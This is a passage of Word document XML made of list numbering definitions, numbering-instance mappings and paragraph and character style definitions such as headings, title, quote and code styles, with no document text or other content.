      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="739" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1459" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2179" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2899" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3619" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4339" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5059" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5779" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6499" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="29" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="54B02423"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0B80ABF6"/>
    <w:styleLink w:val="WWNum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555B4D9B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D8A4A100"/>
    <w:styleLink w:val="WWNum2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55770DBA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="733AE150"/>
    <w:styleLink w:val="WWNum32"/>
    <w:lvl w:ilvl="0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:eastAsia="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581901CF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3648F430"/>
    <w:styleLink w:val="WWNum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D0727B8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E9E45AB0"/>
    <w:styleLink w:val="WWNum30"/>
    <w:lvl w:ilvl="0">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1089" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1449" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2169" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2889" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3609" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4329" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5049" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5769" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6489" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="34" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="60A31CC4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="76620A30"/>
    <w:styleLink w:val="WWNum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76F6A97"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DEC6F494"/>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686E0213"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7B4A654E"/>
    <w:styleLink w:val="WWNum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8D16EA7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="99885EC8"/>
    <w:styleLink w:val="WWNum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AFF51BB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="731A36A4"/>
    <w:styleLink w:val="WWNum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D9059F8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="99E094FA"/>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9"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="33">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="34">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="35">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="36">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="37">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="38">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="39">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="40">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="41">
    <w:abstractNumId w:val="3"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="42">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="43">
    <w:abstractNumId w:val="2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B2A"/>
    <w:rsid w:val="00164B2A"/>
    <w:rsid w:val="00594E47"/>
    <w:rsid w:val="005E1AFB"/>
    <w:rsid w:val="0067180A"/>
    <w:rsid w:val="00680500"/>
    <w:rsid w:val="00820F0A"/>
    <w:rsid w:val="00996A42"/>
    <w:rsid w:val="00AD2FFF"/>
    <w:rsid w:val="00C77908"/>
    <w:rsid w:val="00FA1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6F5C"/>
  <w15:docId w15:val="{BAD23081-4D61-4509-9227-890F9999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F" w:hAnsi="Calibri" w:cs="F"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="en-US"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pageBreakBefore/>
      <w:numPr>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="360"/>
      <w:jc w:val="right"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="F" w:cs="F"/>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="000000"/>
      <w:sz w:val="48"/>
      <w:szCs w:val="36"/>
      <w:lang w:val="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Standard"/>
    <w:next w:val="Standard"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="12" w:space="1" w:color="000000"/>
      </w:pBdr>
      <w:spacing w:before="360" w:after="200"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="F" w:cs="F"/>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="000000"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Standard"/>
    <w:next w:val="Standard"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="4" w:space="1" w:color="000000"/>
      </w:pBdr>
      <w:spacing w:before="200" w:after="0"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="F" w:hAnsi="Arial" w:cs="F"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Standard"/>
    <w:next w:val="Standard"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="200" w:after="0"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:eastAsia="F" w:hAnsi="Calibri Light" w:cs="F"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Standard"/>
    <w:next w:val="Standard"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="4"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="200" w:after="0"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:eastAsia="F" w:hAnsi="Calibri Light" w:cs="F"/>
      <w:color w:val="252525"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="Standard"/>
    <w:next w:val="Standard"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="5"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="200" w:after="0"/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:eastAsia="F" w:hAnsi="Calibri Light" w:cs="F"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="252525"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading7">
    <w:name w:val="heading 7"/>
    <w:basedOn w:val="Standard"/>
    <w:next w:val="Standard"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="6"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="200" w:after="0"/>
      <w:outlineLvl w:val="6"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:eastAsia="F" w:hAnsi="Calibri Light" w:cs="F"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading8">
    <w:name w:val="heading 8"/>
    <w:basedOn w:val="Standard"/>
    <w:next w:val="Standard"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="7"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="200" w:after="0"/>
      <w:outlineLvl w:val="7"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:eastAsia="F" w:hAnsi="Calibri Light" w:cs="F"/>
      <w:color w:val="404040"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading9">
    <w:name w:val="heading 9"/>
    <w:basedOn w:val="Standard"/>
    <w:next w:val="Standard"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="8"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:spacing w:before="200" w:after="0"/>
      <w:outlineLvl w:val="8"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:eastAsia="F" w:hAnsi="Calibri Light" w:cs="F"/>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after="160" w:line="259" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>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next w:val="Standard"/>
    <w:pPr>
      <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="323232"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Index">
    <w:name w:val="Index"/>
    <w:basedOn w:val="Standard"/>
    <w:pPr>
      <w:suppressLineNumbers/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Lucida Sans"/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Standard"/>
    <w:next w:val="Standard"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="F" w:cs="F"/>
      <w:b/>
      <w:color w:val="000000"/>
      <w:sz w:val="56"/>
      <w:szCs w:val="56"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Subtitle">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="Standard"/>
    <w:next w:val="Standard"/>
    <w:uiPriority w:val="11"/>
    <w:qFormat/>
    <w:rPr>
      <w:color w:val="5A5A5A"/>
      <w:spacing w:val="10"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Quote">
    <w:name w:val="Quote"/>
    <w:basedOn w:val="Standard"/>
    <w:next w:val="Standard"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:ind w:left="720" w:right="720"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Standard"/>
    <w:next w:val="Standard"/>
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="24" w:space="1" w:color="F2F2F2"/>
        <w:bottom w:val="single" w:sz="24" w:space="1" w:color="F2F2F2"/>
      </w:pBdr>
      <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
      <w:spacing w:before="240" w:after="240"/>
      <w:ind w:left="936" w:right="936"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Standard"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:pPr>
      <w:widowControl/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Standard"/>
    <w:pPr>
      <w:ind w:left="720"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="code">
    <w:name w:val="code"/>
    <w:basedOn w:val="NoSpacing"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:eastAsia="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
      <w:sz w:val="20"/>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customStyle="1" w:styleId="Contents3">
    <w:name w:val="Contents 3"/>
    <w:basedOn w:val="Standard"/>
    <w:next w:val="Standard"/>
    <w:autoRedefine/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>
    </w:p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BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Standard"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:eastAsia="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Abtracttitle">
    <w:name w:val="Abtracttitle"/>
    <w:basedOn w:val="Standard"/>
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="4" w:space="1" w:color="000000"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="left" w:pos="2390"/>
      </w:tabs>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="40"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Revision">
    <w:name w:val="Revision"/>
    <w:pPr>
      <w:widowControl/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Footnote">
    <w:name w:val="Footnote"/>
    <w:basedOn w:val="Standard"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-GB" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TableofFigures">
    <w:name w:val="table of figures"/>
    <w:basedOn w:val="Standard"/>
    <w:next w:val="Standard"/>
    <w:pPr>
      <w:spacing w:after="0"/>
    </w:p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Standard"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TitleChar">
    <w:name w:val="Title Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:eastAsia="F" w:cs="F"/>
      <w:b/>
      <w:color w:val="000000"/>
      <w:sz w:val="56"/>
      <w:szCs w:val="56"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="SubtitleChar">
    <w:name w:val="Subtitle Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:color w:val="5A5A5A"/>
      <w:spacing w:val="10"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="F" w:hAnsi="Calibri" w:cs="F"/>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="000000"/>
      <w:sz w:val="48"/>
      <w:szCs w:val="36"/>
      <w:lang w:val="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="F" w:hAnsi="Calibri" w:cs="F"/>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="000000"/>
      <w:sz w:val="30"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="F" w:hAnsi="Arial" w:cs="F"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:eastAsia="F" w:hAnsi="Calibri Light" w:cs="F"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading5Char">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:eastAsia="F" w:hAnsi="Calibri Light" w:cs="F"/>
      <w:color w:val="252525"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading6Char">
    <w:name w:val="Heading 6 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:eastAsia="F" w:hAnsi="Calibri Light" w:cs="F"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="252525"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading7Char">
    <w:name w:val="Heading 7 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:eastAsia="F" w:hAnsi="Calibri Light" w:cs="F"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading8Char">
    <w:name w:val="Heading 8 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:eastAsia="F" w:hAnsi="Calibri Light" w:cs="F"/>
      <w:color w:val="404040"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading9Char">
    <w:name w:val="Heading 9 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri Light" w:eastAsia="F" w:hAnsi="Calibri Light" w:cs="F"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="SubtleEmphasis">
    <w:name w:val="Subtle Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="auto"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:caps/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rPr>
